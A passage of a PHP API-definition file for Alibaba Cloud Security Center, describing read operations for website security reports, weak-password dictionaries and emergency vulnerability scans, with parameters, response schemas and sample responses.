has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query risky websites in website security report', 'summary' => 'Queries websites with risks and their associated security information from the website security report, including the number of vulnerabilities and alerts.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainSecureRiskList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"NoSslCount\\": 1,\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F****\\",\\n \\"RiskCount\\": 1,\\n \\"RiskList\\": [\\n {\\n \\"SslBrand\\": \\"globalsign\\",\\n \\"SslStatus\\": 1,\\n \\"Domain\\": \\"test.com\\",\\n \\"VulCount\\": 1,\\n \\"AlarmCount\\": 1,\\n \\"UuidList\\": [\\n \\"d033b152-b8c0-48e0-8980-29f2e52bxxxx\\"\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeDomainSecureScore' => [ 'summary' => 'Queries the security score of a website security report. The maximum score is 100.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the visitor.', 'type' => 'string', 'required' => false, 'example' => '123.113.*.*', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'SecurityScore' => ['description' => 'The security score of the website.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '11C96623-E106-59C9-866D-A6C82911****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the security score of a website security report', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainSecureScore', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"SecurityScore\\": 100,\\n \\"RequestId\\": \\"11C96623-E106-59C9-866D-A6C82911****\\"\\n}","type":"json"}]', ], 'DescribeDomainSecureStatistics' => [ 'summary' => 'Queries the statistics of a website security report, including the number of websites and security events.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '113.87.*.*', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'NoSslCount' => ['description' => 'The number of websites without certificates.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1EE7B150-D67E-53FD-A52D-3E8E669A****', 'title' => ''], 'TotalDomainCount' => ['description' => 'The total number of domain names.', 'type' => 'integer', 'format' => 'int32', 'example' => '72', 'title' => ''], 'RiskCount' => ['description' => 'The number of domain names that have security risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'VulCount' => ['description' => 'The number of domain names that have vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AlarmCount' => ['description' => 'The number of domain names that have security alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query website security report statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainSecureStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"NoSslCount\\": 1,\\n \\"RequestId\\": \\"1EE7B150-D67E-53FD-A52D-3E8E669A****\\",\\n \\"TotalDomainCount\\": 72,\\n \\"RiskCount\\": 1,\\n \\"VulCount\\": 2,\\n \\"AlarmCount\\": 2\\n}","type":"json"}]', ], 'DescribeDomainSecureSuggests' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92065', 'abilityTreeNodes' => ['FEATUREsas3VVW1Q'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '218.249.*.*', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RiskSuggest' => ['description' => 'The overall suggestion for security hardening.', 'type' => 'string', 'example' => 'Use the security center, such as security alerts, vulnerability scanning, and vulnerability fixes, to resolve security risks as soon as possible.', 'title' => ''], 'WebLockSuggest' => ['description' => 'The suggestion for web tamper-proofing.', 'type' => 'string', 'example' => 'The website tamper-proofing feature is recommended to prevent the website from being maliciously injected into external links, and being tampered with as malicious information, causing serious negative social impact to the enterprise.', 'title' => ''], 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], 'VulSuggest' => ['description' => 'The suggestion for vulnerability fixing.', 'type' => 'integer', 'format' => 'int64', 'example' => 'If your business cannot promptly fix vulnerabilities in high-risk applications, we recommend that you enable the cloud firewall IPS feature to intercept malicious attacks on the network side.', 'title' => ''], 'TotalCount' => ['description' => 'The total number of security suggestions.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security suggestions in a website security report', 'summary' => 'Queries the security suggestions in a website security report.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainSecureSuggests', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RiskSuggest\\": \\"Use the security center, such as security alerts, vulnerability scanning, and vulnerability fixes, to resolve security risks as soon as possible.\\",\\n \\"WebLockSuggest\\": \\"The website tamper-proofing feature is recommended to prevent the website from being maliciously injected into external links, and being tampered with as malicious information, causing serious negative social impact to the enterprise.\\",\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"VulSuggest\\": 0,\\n \\"TotalCount\\": 4\\n}","type":"json"}]', ], 'DescribeDomainSecureVulList' => [ 'summary' => 'Queries the vulnerability list in a website security report.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '111.196.*.*', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The identifier of the request source. Set the value to sas.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The vulnerability type. Valid values:'."\n" .' - **app**: application vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'app', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of vulnerabilities returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****', 'title' => ''], 'VulList' => [ 'description' => 'The list of vulnerabilities associated with the domain name.', 'type' => 'array', 'items' => [ 'description' => 'The list of vulnerabilities associated with the domain name.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the vulnerability to query. Default value: cve. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **app**: application vulnerability (network scan)'."\n" .'- **sca**: application vulnerability (software constituency parsing)', 'type' => 'string', 'example' => 'app', 'title' => ''], 'NntfCount' => ['description' => 'The number of low-priority vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'HandledCount' => ['description' => 'The number of handled vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '33', 'title' => ''], 'GmtLast' => ['description' => 'The timestamp when the vulnerability was last detected, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1639371446000', 'title' => ''], 'Tags' => ['description' => 'The label of the vulnerability. Valid values:'."\n" ."\n" .''."\n" .'- Restart required'."\n" .'- Remote utilization'."\n" .'- EXP exists'."\n" .'- Available'."\n" .'- Privilege escalation'."\n" .'- Code execution'."\n" .''."\n" ."\n" .''."\n" .'- Restart required'."\n" .'- Remote utilization'."\n" .'- EXP exists'."\n" .'- Available'."\n" .'- Privilege escalation'."\n" .'- Code execution'."\n" .'', 'type' => 'string', 'example' => 'Code Execution', 'title' => ''], 'LaterCount' => ['description' => 'The number of medium-priority vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'example' => 'CESA-2023:3555: python Security Update', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'oval:com.redhat.rhsa:def:20170574'."\n", 'title' => ''], 'AsapCount' => ['description' => 'The number of high-priority vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '50', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query vulnerability list in a website security report', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainSecureVulList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 100,\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\",\\n \\"VulList\\": [\\n {\\n \\"Type\\": \\"app\\",\\n \\"NntfCount\\": 20,\\n \\"HandledCount\\": 33,\\n \\"GmtLast\\": 1639371446000,\\n \\"Tags\\": \\"Code Execution\\",\\n \\"LaterCount\\": 30,\\n \\"AliasName\\": \\"CESA-2023:3555: python Security Update\\",\\n \\"Name\\": \\"oval:com.redhat.rhsa:def:20170574\\\\n\\",\\n \\"AsapCount\\": 50\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeDynamicDict' => [ 'summary' => 'Queries the user-defined dynamic weak password rules for baseline checks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '101.204.XX.XX'."\n", 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'OssUrl' => ['description' => 'The OSS object URL.', 'type' => 'string', 'example' => 'cloudtest01/661767e1-5ae3-4ec5-865f-03039436893a/sacc2*****', 'title' => ''], 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generated for the request.', 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C61****', 'title' => ''], 'Limit' => ['description' => 'The maximum number of weak password rules that can be added.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'Count' => ['description' => 'The number of weak password rules that have been added.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'FileName' => ['description' => 'The name of the weak password file in OSS.', 'type' => 'string', 'example' => 'test_dict.plain', 'title' => ''], 'UploadTime' => ['description' => 'The upload timestamp, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1719919421', 'title' => ''], 'FileSize' => ['description' => 'The file size, in bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '40', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::DescribeCustomizedDict'], ], 'title' => 'Query dynamic weak passwords', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDynamicDict'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDynamicDict', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"OssUrl\\": \\"cloudtest01/661767e1-5ae3-4ec5-865f-03039436893a/sacc2*****\\",\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C61****\\",\\n \\"Limit\\": 9,\\n \\"Count\\": 1,\\n \\"FileName\\": \\"test_dict.plain\\",\\n \\"UploadTime\\": 1719919421,\\n \\"FileSize\\": 40\\n}","type":"json"}]', ], 'DescribeDynamicDictUploadInfo' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '123.103.XX.XX'."\n", 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The key of the OSS file name.', 'type' => 'string', 'example' => 'DegradePool_Offset_****', 'title' => ''], 'Signature' => ['description' => 'The signature information calculated based on **AccessKeySecret** and **Policy**. When you call an OSS API operation, OSS verifies this signature information to confirm the validity of the POST request.', 'type' => 'string', 'example' => 'wBiwkhd5LGcLzijtc3FhI****', 'title' => ''], 'Host' => ['description' => 'The OSS domain name.', 'type' => 'string', 'example' => 'https://aegis-update-static-file.oss-cn-hangzhou.aliyuncs.com', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C61***', 'title' => ''], 'Policy' => ['description' => 'The OSS security policy.', 'type' => 'string', 'example' => 'eyJleHBpcmF0aW9uIjoiMjAyNC0wNy0wMlQxMTozMTozMy40MjlaIiwiY29uZGl0aW9********', 'title' => ''], 'Accessid' => ['description' => 'The AccessKey ID of OSS.', 'type' => 'string', 'example' => 'yourAccessKeyID', 'title' => ''], 'Expire' => ['description' => 'The expiration time of the OSS authorization, in timestamp format.', 'type' => 'string', 'example' => '1719919893', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::DescribeCustomizedDictUploadInfo'], ], 'title' => 'Query OSS upload details of dynamic weak passwords', 'summary' => 'Queries the OSS upload details of user-defined dynamic weak passwords for baseline checks.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDynamicDictUploadInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDynamicDictUploadInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Key\\": \\"DegradePool_Offset_****\\",\\n \\"Signature\\": \\"wBiwkhd5LGcLzijtc3FhI****\\",\\n \\"Host\\": \\"https://aegis-update-static-file.oss-cn-hangzhou.aliyuncs.com\\",\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C61***\\",\\n \\"Policy\\": \\"eyJleHBpcmF0aW9uIjoiMjAyNC0wNy0wMlQxMTozMTozMy40MjlaIiwiY29uZGl0aW9********\\",\\n \\"Accessid\\": \\"yourAccessKeyID\\",\\n \\"Expire\\": \\"1719919893\\"\\n}","type":"json"}]', ], 'DescribeEmgUserAgreement' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Auth' => ['description' => 'Indicates whether the emergency vulnerability scan is authorized. Valid values:'."\n" ."\n" .'- **true**: Authorized.'."\n" .'- **false**: Not authorized.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '768BB9F5-8AF3-557F-A489-9BDD64CB3E4C', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query emergency vulnerability user agreement', 'summary' => 'Queries the emergency vulnerability user authorization agreement.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeEmgUserAgreement'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeEmgUserAgreement', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Auth\\": true,\\n \\"RequestId\\": \\"768BB9F5-8AF3-557F-A489-9BDD64CB3E4C\\"\\n}","type":"json"}]', ], 'DescribeEmgVulItem' => [ 'summary' => 'Queries the details of emergency vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RiskStatus', 'in' => 'query', 'schema' => ['description' => 'The risk status of the vulnerabilities to query. If this parameter is not specified, vulnerabilities of all risk statuses are returned, including those with risks and those without risks. Valid values:'."\n" .'- **y**: at risk'."\n" .'- **n**: not at risk.', 'type' => 'string', 'required' => false, 'example' => 'y', 'title' => ''], ], [ 'name' => 'ScanType', 'in' => 'query', 'schema' => ['description' => 'The detection method of the vulnerabilities to query. If this parameter is not specified, vulnerabilities detected by all methods are returned by default, including version detection and network scanning. Valid values:'."\n" .'- **python**: version detection (server software version detection). Detects whether your server has disclosed software vulnerabilities.'."\n" .'- **scan**: network scanning (network traffic detection). Detects whether your public assets (Internet-accessible servers) have vulnerabilities.', 'type' => 'string', 'required' => false, 'example' => 'python', 'title' => ''], ], [ 'name' => 'CheckType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The check type. Valid values:'."\n" ."\n" .'- **0**: POC verification'."\n" .'- **1**: version comparison.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'required' => false], ], [ 'name' => 'VulName', 'in' => 'query', 'schema' => ['description' => 'The name of the emergency vulnerability to query.', 'type' => 'string', 'required' => false, 'example' => 'Changjietong T + SetupAccount/Upload.aspx file Upload vulnerability (CNVD-2022-60632)', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the first page to return. Default value: **1**, which indicates that query results are displayed starting from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query. Default value: **10**, which indicates that 10 emergency vulnerability entries are displayed per page. Maximum value: 50.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member accounts in the resource directory (Alibaba Cloud account).'."\n" .'> Invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page. The value starts from **1**. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BC1868ED-A0E1-4D1C-BF7E-10DC0C34B3C3', 'title' => ''], 'PageSize' => ['description' => 'The number of emergency vulnerability entries per page in a paged query. Default value: **10**, which indicates that 10 emergency vulnerability entries are displayed per page. Paging is used to display the results.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of emergency vulnerabilities returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'GroupedVulItems' => [ 'description' => 'The information about the emergency vulnerabilities.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The detection status of the vulnerability. Valid values:'."\n" .'- **10**: not detected'."\n" .'- **20**: detecting'."\n" .'- **30**: detection completed.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Type' => ['description' => 'The detection method of the vulnerability. Valid values:'."\n" .'- **python**: version detection (server software version detection). Detects whether your server has disclosed software vulnerabilities.'."\n" .'- **scan**: network scanning (network traffic detection). Detects whether your public assets (Internet-accessible servers) have vulnerabilities.', 'type' => 'string', 'example' => 'scan', 'title' => ''], 'CheckType' => ['description' => 'The check type.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'GmtLastCheck' => ['description' => 'The timestamp of the most recent vulnerability detection. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1619286031000', 'title' => ''], 'Progress' => ['description' => 'The detection progress of the vulnerability. Value range: 0 to 100.'."\n" .'> This parameter is displayed only for emergency vulnerabilities that are in the detecting state.', 'type' => 'integer', 'format' => 'int32', 'example' => '50', 'title' => ''], 'Description' => ['description' => 'The description of the vulnerability.', 'type' => 'string', 'example' => 'Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.', 'title' => ''], 'GmtPublish' => ['description' => 'The timestamp when the vulnerability was published. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1618887687000', 'title' => ''], 'PendingCount' => ['description' => 'The number of unfixed vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AliasName' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'Changjietong T + SetupAccount/Upload.aspx file Upload vulnerability (CNVD-2022-60632)', 'title' => ''], 'Name' => ['description' => 'The name of the scan rule.', 'type' => 'string', 'example' => 'scan:AVD-2021-179344', 'title' => ''], 'RaspDefend' => ['description' => 'Indicates whether Runtime Application Self-Protection (RASP) real-time protection is supported. Valid values:'."\n" .'- **0**: Not supported.'."\n" .'- **1**: Supported.'."\n" .'> If this property is not present, RASP real-time protection is not supported.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 